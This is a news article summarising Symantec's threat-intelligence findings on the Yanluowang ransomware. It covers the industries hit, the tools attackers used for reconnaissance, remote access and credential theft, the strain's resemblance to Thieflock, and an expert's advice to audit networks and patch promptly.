Symantec recently identified a new ransomware strain known as Yanluowang in targeted operations against US companies.
The Symantec Threat Hunter team has found a "new arrival to the targeted ransomware scene" during October that seemed to have been in the development stage. Nevertheless, according to a blog post published on Wednesday 1st of December 2021, the variation dates back to at least August of this year. As per Symantec, the operators behind Yanluowang mostly targeted financial firms, although businesses in the manufacturing, IT services, consulting, and engineering industries have also been attacked.
According to Vikram Thakur, technical director at Symantec, the danger is more opportunistic than carefully focused ransomware attacks. Thakur has encountered the majority of situations involving unfixed Microsoft Exchange servers or Internet Information Services (ISS) servers.
Symantec detected multiple evidence of compromise, including the usage of publicly available tools such as AdFind to locate the victim's Active Directory server and SoftPerfect Network Scanner, which finds hostnames and network services. Yanluowang threat actors frequently employ BazarLoader, a malware version typically employed in the early stages of ransomware assaults.
"Once attackers get onto the computer, they take the installer for ConnectWise type applications and then double click on it and then they install it," Thakur said.
"If I was to take a look at the last 100 ransomware connected investigations over the last couple of months, attackers have always installed it on the computer rather than relying upon something that's already there."
In most cases, according to the blog post, "PowerShell was used to download tools to compromised systems."
"After gaining initial access, the attackers usually deploy ConnectWise (formerly known as ScreenConnect), a legitimate remote access tool."
Among the most recent attack phases detected by Symantec is featured credential theft employing a variety of credential-stealing programs, including GrabChrome, which collects credentials from Chrome. Open-source tools such as KeeThieft, described by Symantec as a "PowerShell script to copy the master key from KeePass" have also been used.
While investigating the new ransomware outbreak, Symantec Threat Intelligence discovered certain tactics, methods, and procedures (TTP) that are similar to Thieflock, a well-known ransomware-as-a-service "developed by the Canthroid".
The usage of "custom password recovery tools such as GrabFF and other open-source password dumping tools." was mentioned in one link.
To counteract the Yanluowang threat, Thakur proposes that businesses must audit the computers on their network and hunt for unapproved software.
"The simplest solution is when patches are released for the applications on your machines, test them, deploy them as quickly as possible, because attackers are going to exploit them in just a matter of days after," he added.
